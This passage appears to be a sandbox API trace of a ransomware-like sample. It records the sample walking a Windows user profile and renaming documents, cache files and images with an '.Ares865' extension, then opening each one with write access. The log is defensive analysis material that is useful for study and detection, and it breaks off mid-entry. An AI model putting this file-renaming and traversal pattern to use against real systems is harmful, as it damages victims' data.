lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\-enPM9tXv_cz9F", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\-enPM9tXv_cz9F") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\-enPM9tXv_cz9F" [0094.541] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\-enPM9tXv_cz9F\\d2aTqFV_t.xls.Ares865") returned 79 [0094.541] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\-enPM9tXv_cz9F\\d2aTqFV_t.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\-enpm9txv_cz9f\\d2atqfv_t.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\-enPM9tXv_cz9F\\d2aTqFV_t.xls.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\-enpm9txv_cz9f\\d2atqfv_t.xls.ares865"), dwFlags=0x1) returned 1 [0094.542] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\-enPM9tXv_cz9F\\d2aTqFV_t.xls.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\-enpm9txv_cz9f\\d2atqfv_t.xls.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.542] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=46386) returned 1 [0094.546] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" [0094.546] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\pZcR", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\pZcR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\pZcR" [0094.547] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\pZcR\\X vjbeaqUS0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\pZcR\\X vjbeaqUS0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\pZcR\\X vjbeaqUS0" [0094.547] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\pZcR\\X vjbeaqUS0\\HC0sKyi n78JtM2xl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\pZcR\\X vjbeaqUS0\\HC0sKyi n78JtM2xl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\pZcR\\X vjbeaqUS0\\HC0sKyi n78JtM2xl" [0094.547] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0tvd", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0tvd") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0tvd" [0094.547] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0tvd\\yIh8e_hXYMP-HD", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0tvd\\yIh8e_hXYMP-HD") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0tvd\\yIh8e_hXYMP-HD" [0094.548] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM" [0094.548] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0tvd\\yIh8e_hXYMP-HD\\nZm-nuE9GlM\\0nc7 RNZKx5" [0094.548] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0tvd\\EaPJ", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0tvd\\EaPJ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0tvd\\EaPJ" [0094.549] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0tvd\\a5xHFgAnq", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0tvd\\a5xHFgAnq") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0tvd\\a5xHFgAnq" [0094.549] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0tvd\\a5xHFgAnq\\SYJm5ty_9Yg3ouLbVrXO", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0tvd\\a5xHFgAnq\\SYJm5ty_9Yg3ouLbVrXO") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0tvd\\a5xHFgAnq\\SYJm5ty_9Yg3ouLbVrXO" [0094.549] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings" [0094.550] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\GDIPFONTCACHEV1.DAT.Ares865") returned 72 [0094.550] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\gdipfontcachev1.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\GDIPFONTCACHEV1.DAT.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\gdipfontcachev1.dat.ares865"), dwFlags=0x1) returned 1 [0094.551] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\GDIPFONTCACHEV1.DAT.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\gdipfontcachev1.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.551] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=108824) returned 1 [0094.560] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\VirtualStore", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\VirtualStore") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\VirtualStore" [0094.561] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files" [0094.561] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\desktop.ini.Ares865") returned 89 [0094.561] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0094.563] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.563] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67) returned 1 [0094.569] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Virtualized", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Virtualized" [0094.569] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Virtualized\\C", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Virtualized\\C") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Virtualized\\C" [0094.570] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Virtualized\\C\\Users", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Virtualized\\C\\Users") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Virtualized\\C\\Users" [0094.570] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz" [0094.570] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" [0094.574] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0094.576] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft" [0094.577] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low" [0094.577] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\desktop.ini.Ares865") returned 93 [0094.577] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0094.578] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.579] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67) returned 1 [0094.582] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\MSIMGSIZ.DAT.Ares865") returned 94 [0094.582] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\MSIMGSIZ.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\msimgsiz.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\MSIMGSIZ.DAT.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\msimgsiz.dat.ares865"), dwFlags=0x1) returned 1 [0094.583] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\MSIMGSIZ.DAT.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\msimgsiz.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.583] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16384) returned 1 [0094.586] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5" [0094.587] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\desktop.ini.Ares865") returned 105 [0094.587] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0094.588] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.588] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67) returned 1 [0094.592] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\index.dat.Ares865") returned 103 [0094.592] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\index.dat.ares865"), dwFlags=0x1) returned 1 [0094.593] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\index.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.593] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=344064) returned 1 [0094.615] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8" [0094.615] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\0ff92924-f857-491e-a2ee-c0fe20f0d064[1].jpg.Ares865") returned 146 [0094.615] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\0ff92924-f857-491e-a2ee-c0fe20f0d064[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\0ff92924-f857-491e-a2ee-c0fe20f0d064[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\0ff92924-f857-491e-a2ee-c0fe20f0d064[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\0ff92924-f857-491e-a2ee-c0fe20f0d064[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.617] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\0ff92924-f857-491e-a2ee-c0fe20f0d064[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\0ff92924-f857-491e-a2ee-c0fe20f0d064[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.617] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32638) returned 1 [0094.622] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\26158[1].png.Ares865") returned 115 [0094.622] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\26158[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\26158[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\26158[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\26158[1].png.ares865"), dwFlags=0x1) returned 1 [0094.623] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\26158[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\26158[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.624] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49247) returned 1 [0094.629] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA42x3V[1].png.Ares865") returned 117 [0094.629] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA42x3V[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa42x3v[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA42x3V[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa42x3v[1].png.ares865"), dwFlags=0x1) returned 1 [0094.630] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA42x3V[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa42x3v[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.631] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=995) returned 1 [0094.633] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA58NQj[1].png.Ares865") returned 117 [0094.633] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA58NQj[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa58nqj[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA58NQj[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa58nqj[1].png.ares865"), dwFlags=0x1) returned 1 [0094.634] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA58NQj[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa58nqj[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.635] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=464) returned 1 [0094.642] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA61Ofl[1].png.Ares865") returned 117 [0094.642] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA61Ofl[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa61ofl[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA61Ofl[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa61ofl[1].png.ares865"), dwFlags=0x1) returned 1 [0094.643] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA61Ofl[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa61ofl[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.644] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=452) returned 1 [0094.646] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS 